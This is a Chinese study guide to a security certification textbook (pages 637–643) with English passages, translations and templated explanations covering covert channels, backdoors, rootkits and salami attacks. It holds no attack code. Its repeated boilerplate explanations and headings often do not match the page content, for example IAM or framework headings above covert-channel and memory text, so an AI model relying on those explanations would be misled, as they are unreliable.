学习单元 94 / PDF P637

第 637 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

A covert channel is a method that is used to pass information over a path that is not normally used for communication. Because the path is not normally used for communication, it may not be protected by the system's normal security controls. Using a covert channel provides a means to violate, bypass, or circumvent a security policy undetected. Covert channels are one of the important examples of vulnerabilities of security architectures. As you might imagine, a covert channel is the opposite of an overt channel. An overt channel is a known, expected, authorized, designed, monitored, and controlled method of communication.

Therefore, a covert channel is an unknown, unexpected, unauthorized, not designed (at least not by the original system designers), unmonitored, and uncontrolled method of data transfer. There are two basic types of covert channels: Covert Timing Channel A covert timing channel conveys information by altering the performance of a system component or modifying a resource's timing in a predictable manner. Using a covert timing channel is generally a method to secretly transfer data and is very difficult to detect. Covert Storage Channel A covert storage channel conveys information by writing data to a common storage area where another process can read it.

When assessing the security of software, be diligent for any process that writes to any area of memory that another process can read. Examples of covert timing channels include the following: Blinking a light visible outside the building so that if a reading is taken every two seconds when the light is on count it as a 1 and when the light is off count it as a 0. With an external camera linked to a recording system, a slow transmission of binary data can occur. Using a microphone to listen to the noise occurring in an area or related to a computer system. Then modify a case fan to spin faster (for a 1) or slower (for a 0) to force a change in the noise generated every 10 seconds.

Monitoring utilization levels of an Internet connection when an insider is artificially padding or restricting traffic every 30 seconds. When traffic

中文直译 / 整理

一个隐蔽信道是一种通过非正常通信路径传递信息的方法。 由于该路径通常不 用于通信,因此可能不受系统正常安全控制的保护。 使用隐蔽信道提供了一种 在不被察觉的情况下违反、绕过或规避安全策略的手段。 隐蔽信道是安全架构 漏洞的重要示例之一。 正如你可能想象的那样,隐蔽信道是显式信道的反面。 一个显式信道是一种已 知、预期、授权、设计、监控和受控的通信方法。 因此,隐蔽信道是一种未知、 意外、未授权、未设计(至少不是由原始系统设计者设计)、未监控和未受控 的数据传输方法。 隐蔽信道有两种基本类型: 隐蔽定时信道 一个隐蔽定时信道通过改变系统组件的性能或以可预测的方 式修改资源的时序来传输信息。 使用隐蔽定时信道通常是秘密传输数据的方 法,且极难检测。 隐蔽存储信道 一个隐蔽存储信道通过将数据写入公共存储区域,使另一个 进程能够读取它来传输信息。 在评估软件安全性时,请务必留意任何向其 他进程可读取的内存区域写入数据的进程。 隐蔽定时信道的示例包括以下内容: 让一个可见于建筑物外部的灯闪烁,以便每两秒读取一次信号:灯亮时计 为1,灯灭时计为0。 通过将外部摄像头连接到记录系统,可以实现缓慢的 二进制数据传输。

使用麦克风监听某个区域或与计算机系统相关的噪音。 然后调整机箱风扇 的转速(快表示1,慢表示0),每10秒强制改变产生的噪音。 当内部人员每30秒人为增加或限制流量时,监控互联网连接的利用率。 当流 量

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

政策:政策是高层原则,说明必须遵守什么。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 637 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Policy 高层、强制、稳定;Procedure 具体步骤。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
政策 政策是高层原则,说明必须遵守什么。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 95 / PDF P638

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

is above 80 percent utilization, record a 1; when below 40 percent utilization, record a 0.

Here are examples of covert storage channels; notice that they all involve placing data in a location that is either unseen by the OS or ignored by the OS: Writing data into unallocated or unpartitioned space, which may be accomplished using a hex editor Writing data directly into a bad sector of an HDD or a bad block on an SSD Writing data into the unused space at the end of a cluster, an area known as slack space Writing data directly into sectors or clusters without proper registration with the directory system, file container, or header Both types of covert channels rely on the use of communication techniques to exchange information with otherwise unauthorized subjects.

Detecting such abuse can be difficult because the covert channel is outside the normal data transfer environment and security oversight. The best defense is to implement detailed and thorough auditing of all user and application activities and analyze log files for any covert channel activity, which may be anomalous behavior or may elicit known malicious activities via heuristics or pattern matching. Attacks Based on Design or Coding Flaws Certain attacks may result from poor design techniques, questionable implementation practices and procedures, or poor or inadequate testing.

Some attacks may result from deliberate design decisions when special points of entry, built into code to circumvent access controls, login, or other security checks often added to code while under development, are not removed when that code is put into production. For what we hope are obvious reasons, such points of egress are properly called maintenance hooks or backdoors because they avoid security measures by design. Extensive testing and code review are required to uncover such covert means of access, which are easy to remove during the final phases of development but can be incredibly difficult to detect during the testing and maintenance phases.

中文直译 / 整理

利用率超过80%时,记录1; 低于40%时,记录0。 以下是隐蔽存储通道的示例; 请注意,它们都涉及将数据写入操作系统未 看到或忽略的位置: 将数据写入未分配或未分区的空间,这可能 通过十六进制编辑器实现 将数据直接写入硬盘的坏扇区或固态硬盘的坏块 将数据写入簇末尾的未使用空间,该区域称为松弛空间 将数据直接写入扇区或簇,但未进行适当注册 通过目录系统、文件容器或标头 这两种隐蔽信道都依赖于通信技术与本无权限的主体交换信息。 检测此类滥用 可能很困难,因为隐蔽信道位于正常数据传输环境和安全监管之外。 最佳防御 措施是实施对所有用户和应用程序活动的详细彻底审计,并分析日志文件以发 现任何隐蔽信道活动,这些活动可能是异常行为,或通过启发式方法或模式匹 配引发已知的恶意活动。 基于设计或编码缺陷的攻击 某些攻击可能源于糟糕的设计技术、可疑的实现方法和流程,或测试不充分或 不充分。 有些攻击可能源于有意的设计决策——在开发过程中,为了绕过访问 控制、登录或其他安全检查,代码中常被植入特殊入口点,但这些入口点在代 码投入生产时未被移除。

出于我们希望显而易见的原因,此类出口点被恰当地 称为维护钩子或后门,因为它们本质上就是规避安全措施的。 要发现此类隐蔽 的访问手段,需要进行广泛的测试和代码审查; 这些手段在开发的最后阶段很 容易移除,但在测试和维护阶段却可能极难检测。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

程序:程序是一步一步怎么做。

审计:审计检查控制是否存在、是否有效、是否符合要求。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

Step-by-step、SOP 常对应 procedure。

审计题关注独立性、证据、范围和报告。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
程序 程序是一步一步怎么做。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 96 / PDF P639

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Poor coding practices and lack of security consideration are common sources or causes of vulnerabilities in system architectures that can be attributed to failures in design, implementation, prerelease code cleanup, or out-and-out coding mistakes. Although such flaws are avoidable, finding and fixing them requires rigorous security-conscious design from the beginning of a development project and extra time and effort spent in testing and analysis. This helps to explain the often lamentable state of software security, but it does not excuse it!

Although functionality testing is commonplace for commercial code and applications, separate testing for security issues has been gaining attention and credibility only in the past few years, courtesy of widely publicized virus and worm attacks, SQL injection attacks, cross-site scripting attacks, and occasional defacements of or disruptions to widely used public sites online. Check out the OWASP Top 10 Web Application Security Risks report at owasp.org/www-project-top-ten. Most of these coding concerns are addressed in Chapter 20, “Software Development Security,” and Chapter 21. Humans will never write completely secure (flawless) code.

Any program that does not gracefully handle any exception is in danger of exiting in an unstable state. It is possible to cleverly crash a program after it has increased its security level to carry out a normal task. If an attacker is successful in crashing the program at the right time, they can attain a higher security level and cause damage to the confidentiality, integrity, and availability of your system. These are just a few of the myriad ways that code can be compromised. Perfect security might be impossible, but you can definitely take many strong measures to secure your code better.

Source code analysis tools implemented throughout the development cycle will minimize the number of flaws in the production release, and the flaws identified prior to production release will cost much less to mitigate. All programs that are executed directly or indirectly must be fully tested to comply with your security model. Make sure you have the latest version of any software installed, and be aware of any known security vulnerabilities. Because each security model, and each security policy, is different, you must ensure that the software you execute does not exceed the authority you allow. Writing secure code is difficult, but it's certainly possible.

Make sure all programs you use are designed to address security concerns. The concepts of code review and testing are covered in Chapter 15, “Security Assessment and Testing.”

中文直译 / 整理

糟糕的编码实践和缺乏安全考量是系统架构中漏洞的常见来源或成因,这些漏 洞可归因于设计、实现、发布前代码清理或 outright 编码错误的失败。 尽管此 类缺陷本可避免,但发现和修复它们需要从开发项目伊始就进行严谨的安全意 识设计,并在测试和分析阶段投入额外的时间与精力。 这有助于解释软件安全 状况常常令人遗憾的原因,但并不能为其开脱! 尽管功能测试在商业代码和应 用程序中已十分普遍,但针对安全问题的独立测试仅在过去几年才因广泛报道 的病毒和蠕虫攻击、SQL注入攻击、跨站脚本攻击,以及一些广受欢迎的公共 网站偶尔被篡改或中断而获得关注与可信度。 请查阅 OWASP 最佳十大 Web 应用安全风险报告:owasp.org/www-project-top-ten。 这些编码问题中的 大多数在第20章“软件开发安全”和中均有涉及。 人类永远无法编写出完全安全(无缺陷)的代码。 任何无法优雅处理异常的程 序都有可能在不稳定状态下退出。 攻击者可以巧妙地在程序提升安全级别以执 行正常任务时使其崩溃。 如果攻击者成功在恰当时机使程序崩溃,他们便可获 得更高的安全级别,并对系统的机密性、完整性和可用性造成损害。

这只是代 码可能被破坏的众多方式中的几种。 完美的安全可能无法实现,但您绝对可以采取许多强有力的措施来更好地保护 您的代码。 在整个开发周期中实施的源代码分析工具将最大限度地减少生产发 布中的缺陷数量,而在生产发布前发现的缺陷将花费更少的成本来修复。 所有 直接或间接执行的程序都必须经过全面测试,以符合您的安全模型。 请确保您 安装了任何软件的最新版本,并了解任何已知的安全漏洞。 由于每个安全模型 和每个安全策略都不同,您必须确保所执行的软件不超过您允许的权限。 编写 安全的代码很困难,但绝对是可能的。 请确保您使用的所有程序都旨在解决安 全问题。 代码审查和测试的概念将在第15章“安全评估与测试”中介绍。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
注入攻击 注入攻击把恶意输入当命令或查询执行。
学习单元 97 / PDF P640

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Rootkits A rootkit is malware that embeds itself deep within an OS. The term is a derivative of the concept of rooting and a utility kit of hacking tools. Rooting is gaining total or full control over a system. A rootkit can manipulate information seen by the OS and displayed to users. A rootkit may replace the OS kernel, shim itself under the kernel, replace device drivers, or infiltrate application libraries so that whatever information it feeds to or hides from the OS, the OS thinks it is normal and acceptable.

This allows a rootkit to hide itself from detection, prevent its files from being viewed by file management tools, and prevent its active processes from being viewed by task management or process management tools. Thus, a rootkit is a type of invisibility shield used to hide itself and other malicious tools. Several rootkit-detection tools are available, some of which are able to remove known rootkits. However, once you suspect a rootkit is on a system, the only truly secure response is to reconstitute or replace the entire computer.

Reconstitution involves performing a thorough storage sanitization operation on all storage devices on that system, reinstalling the OS and all applications from trusted original sources, and then restoring files from trusted rootkit-free backups. Obviously, the best protection against rootkits is defense (i.e., don't get infected in the first place) rather than response. There are often no noticeable symptoms or indicators of compromise related to a rootkit infection. In the moments after the initial rootkit installation, there might be some system sluggishness and unresponsiveness as the rootkit installs itself, but otherwise, it will actively mask any symptoms.

In some rootkit infections, the malware's initial infector, dropper, or installer will perform privilege escalation. A means to potentially detect the presence of a rootkit is to notice when system files, such as device drivers and dynamic-link libraries (DLLs), have a file size and/or hash value change. File hash tracking can be performed manually by an administrator or automatically by HIDSs and system monitoring security tools. Incremental Attacks Some forms of attack occur in slow, gradual increments rather than through obvious or recognizable attempts to compromise system security or integrity. Rootkits

中文直译 / 整理

一个rootkit是一种深入嵌入操作系统内部的恶意软件。 该术语源自“提权”和 一套黑客工具包的概念。 提权是指获得对系统的完全或全部控制权。 Rootkit 可以操纵操作系统看到并显示给用户的信息。 Rootkit 可能替换操作系 统内核,在内核下层伪装自身,替换设备驱动程序,或渗透应用程序库,从而 使其提供给操作系统或隐藏的信息被操作系统视为正常且可接受。 这使得 rootkit 能够隐藏自身不被检测,阻止文件管理工具查看其文件,并阻止任务管 理或进程管理工具查看其活动进程。 因此,rootkit 是一种用于隐藏自身及其他 恶意工具的隐形盾牌。 有多种 rootkit 检测工具可用,其中一些能够移除已知的 rootkit。 然而,一 旦您怀疑系统中存在 rootkit,唯一真正安全的应对方式是重建或更换整个计 算机。 重建包括对系统上所有存储设备执行彻底的存储清理操作,从可信的原 始来源重新安装操作系统和所有应用程序,然后从可信的无 rootkit 备份中恢 复文件。 显然,防范 rootkit 的最佳方法是防御(即,最初就不要被感染), 而非事后应对。 根kit感染通常没有明显的症状或入侵迹象。

在根kit初始安装后的片刻,可能 会出现系统迟缓和无响应的情况,因为根kit正在安装自身,但除此之外,它 会主动隐藏任何症状。 在某些根kit感染中,恶意软件的初始传播者、投放器 或安装程序会执行权限提升。 检测根kit存在的一个方法是注意系统文件(如设备驱动程序和动态链接库( DLL))的文件大小和/或哈希值是否发生变化。 文件哈希跟踪可以由管理员手 动执行,也可以由HIDS和系统监控安全工具自动执行。 增量攻击 某些攻击形式并非通过明显或可识别的尝试来破坏系统安全或完整性,而是以缓慢、 渐进的方式发生。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

哈希本身不提供机密性;它主要用于完整性校验。

检测是 IDS,主动阻断更像 IPS。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 98 / PDF P641

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Two such forms of incremental attack are data diddling and the salami attack. Data diddling occurs when an attacker gains access to a system and makes small or random changes to data during processing, input, or transaction rather than obviously altering file contents or damaging or deleting entire files. Such changes can be difficult to detect unless files and data are protected by encryption or unless some kind of integrity check (such as a checksum or message digest) is routinely performed and applied each time a file is read or written.

Encrypted filesystems, file-level encryption techniques, or some form of file monitoring (which includes integrity checks performed by file integrity monitoring [FIM] tools) usually offer adequate guarantees that no data diddling is underway. Data diddling is often considered an attack performed more often by insiders rather than outsiders (external intruders). The salami attack is more mythical by all published reports. The name of the attack refers to a systematic whittling at assets in accounts or other records with financial value, where very small amounts are deducted from balances regularly and routinely.

Metaphorically, the attack may be explained as stealing a very thin slice from a salami each time it's put on the slicing machine when a paying customer is accessing it. Most security experts concede that salami attacks are possible, especially when organizational insiders could be involved. Organizations can prevent or eliminate such an attack only by proper separation of duties and proper control over code. Setting financial transaction monitors to track very small transfers of funds or other items of value should help to detect such activity; regular employee notification of the practice should help to discourage attempts at such attacks.

If you want an entertaining method of learning about the salami attack or the salami technique, view the movies Office Space and Superman III. You can also read the article from Wired about an attack of this nature from 2008: www.wired.com/2008/05/man-allegedly-b. Summary Shared responsibility is the security design principle indicating that organizations do not operate in isolation. It is because we participate in

中文直译 / 整理

两种这样的增量攻击形式是数据篡改和香肠攻击。 数据篡改发生在攻击者获得系统访问权限后,在数据处理、输入或交易过程中 进行微小或随机的更改,而非明显修改文件内容或破坏、删除整个文件。 除非 文件和数据受到加密保护,或者在每次读写文件时例行执行并应用某种完整性 检查(如校验和或消息摘要),否则此类更改难以被发现。 加密文件系统、文 件级加密技术或某种文件监控(包括由文件完整性监控[FIM] 工具执行的完整 性检查)通常能提供充分的保证,确保没有发生数据篡改。 数据篡改通常被认 为是一种更多由内部人员而非外部人员(外部入侵者)实施的攻击。 香肠攻击在所有已发布的报告中更为虚构。 该攻击名称指的是一种系统性地从 账户或其他具有财务价值的记录中逐步削减资产的行为,即定期、例行地从余 额中扣除极小金额。 隐喻上,这种攻击可被解释为:每当有付费客户访问时, 从香肠切片机上每次切下极薄的一片。 大多数安全专家承认,香肠攻击是可能 的,特别是当组织内部人员参与其中时。 组织唯有通过适当的职责分离和对代 码的严格控制,才能预防或消除此类攻击; 设置金融交易监控以追踪极小金额 的资金或其他有价值物品的转移,有助于发现此类活动;

定期向员工通报此行 为,有助于遏制此类攻击的尝试。 如果您想以一种有趣的方式了解香肠攻击或香肠技术,请观看电影 Office Space 和 Superman III。 您还可以阅读 Wired 上关于2008年一起此 类攻击的文章: www.wired.com/2008/05/man-allegedly-b。 摘要 共同责任是一种安全设计原则,表明组织并非孤立运作。 因为我们参与了

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

加密:加密把内容变成未授权者看不懂的形式。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
遏制 遏制先阻止事件继续扩大,不急着完全修复。
学习单元 99 / PDF P642

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

shared responsibility that we must research, implement, and manage engineering processes using secure design principles. Designing secure computing systems begins with an investigation of hardware, software, and firmware and how those pieces fit into the security puzzle. It's important to understand the principles of common computer and network organizations, architectures, and designs; the difference between address space and memory space; and machine types or system variations.

Additionally, a security professional must have a good grasp of operating modes (user, supervisor, privileged), storage types (primary, secondary, real, virtual, volatile, nonvolatile, random, sequential), and common protection mechanisms (such as process isolation and hardware segmentation). System function, purpose, and design work toward establishing and supporting security or against it. Client-based systems should be concerned about running code from unknown sources as well as protecting local caches. Server-based systems need to manage data flow and optimize operations using large-scale parallel data systems, grid computing, or peer-to-peer solutions when appropriate.

Additional concerns relate to industrial control systems, the Internet of Things, microservices, and infrastructure as code. Virtualization technology is used to host one or more OSs within the memory of a single host computer. Virtual software, virtual networking, softwaredefined everything, containerization, serverless architecture, and other related advancements often dictate the need for virtualization security management. Static environments, embedded systems, cyber-physical systems, HPC systems, edge computing devices, and fog computing devices, mobile devices, and other limited or single-purpose computing environments need security management.

No matter how sophisticated a security architecture is, flaws exist that attackers can exploit. Some flaws are introduced by programmers, whereas others are architectural design issues. Study Essentials Understand shared responsibility. The security design principle indicates that organizations do not operate in isolation. It is because we

中文直译 / 整理

共同责任,我们必须研究、实施并使用安全设计原则来管理工程流程。 设计安全的计算系统始于对硬件、软件和固件的调查,以及这些组件如何融入 安全拼图中。 理解常见的计算机和网络组织、架构和设计原理; 地址空间与内 存空间的区别; 以及机器类型或系统变体至关重要。 此外,安全专业人员必须熟练掌握操作模式(用户、管理员、特权)、存储类 型(主存储、次存储、真实、虚拟、易失、非易失、随机、顺序)以及常见的 保护机制(如进程隔离和硬件分段)。 系统功能、目的和设计工作 面向 建立和支持安全,或 对抗 安全。 基于客户端 的系统应关注运行来自未知来源的代码以及保护本地缓存。 基于服务器的系统 需要管理数据流,并在适当情况下使用大规模并行数据系统、网格计算或点对 点解决方案来优化操作。 其他关注点包括工业控制系统、物联网、微服务和基 础设施即代码。 虚拟化技术用于在单台主机计算机的内存中托管一个或多个操作系统。 虚拟软 件、虚拟网络、软件定义一切、容器化、无服务器架构及其他相关技术进步通 常要求实施虚拟化安全管理。

静态环境、嵌入式系统、网络物理系统、高性能计算系统、边缘计算设备、雾 计算设备、移动设备以及其他受限或专用的计算环境需要安全管理。 无论安全架构多么复杂,都存在攻击者可以利用的缺陷。 一些缺陷由程序员 引入,而另一些则是架构设计问题。 学习要点 理解共同责任。 安全设计原则表明,组织并非孤立运作。 这是因为我们

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

程序:程序是一步一步怎么做。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 100 / PDF P643

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

participate in shared responsibility that we must research, implement, and manage engineering processes using secure design principles. Understand the concept of protection rings. From a security standpoint, protection rings organize code and components in an OS into concentric rings. The deeper inside the circle you go, the higher the privilege level associated with the code that occupies a specific ring. Describe the different types of memory used by a computer. ROM is nonvolatile and can't be written to by the end user. Data can be written to PROM chips only once. EPROM/UVEPROM chips may be erased with ultraviolet light. EEPROM chips may be erased with electrical current.

RAM chips are volatile and lose their contents when the computer is powered off. Know the security issues surrounding memory components. Some security issues surround memory components: the fact that data may remain on the chip after power is removed and the control of access to memory in a multiuser system. Know the concepts of memory addressing. Means of memory addressing include register addressing, immediate addressing, direct addressing, indirect addressing, and base+offset addressing. Describe the different characteristics of storage devices used by computers. Primary storage is the same as memory.

Secondary storage consists of magnetic, flash, and optical media that must be first read into primary memory before the CPU can use the data. Random access storage devices can be read at any point, whereas sequential access devices require scanning through all the data physically stored before the desired location. Know the security issues surrounding secondary storage devices. Three main security issues surround secondary storage devices: removable media can be used to steal data, access controls and encryption must be applied to protect data, and data can remain on the media even after file deletion or media formatting. Know about emanation security.

Many electrical devices emanate electrical signals or radiation that can be intercepted by unauthorized individuals. These signals may contain confidential, sensitive, or private data. TEMPEST/EMSEC countermeasures to Van Eck phreaking (i.e., eavesdropping) include Faraday cages, white noise, control zones, and shielding.

中文直译 / 整理

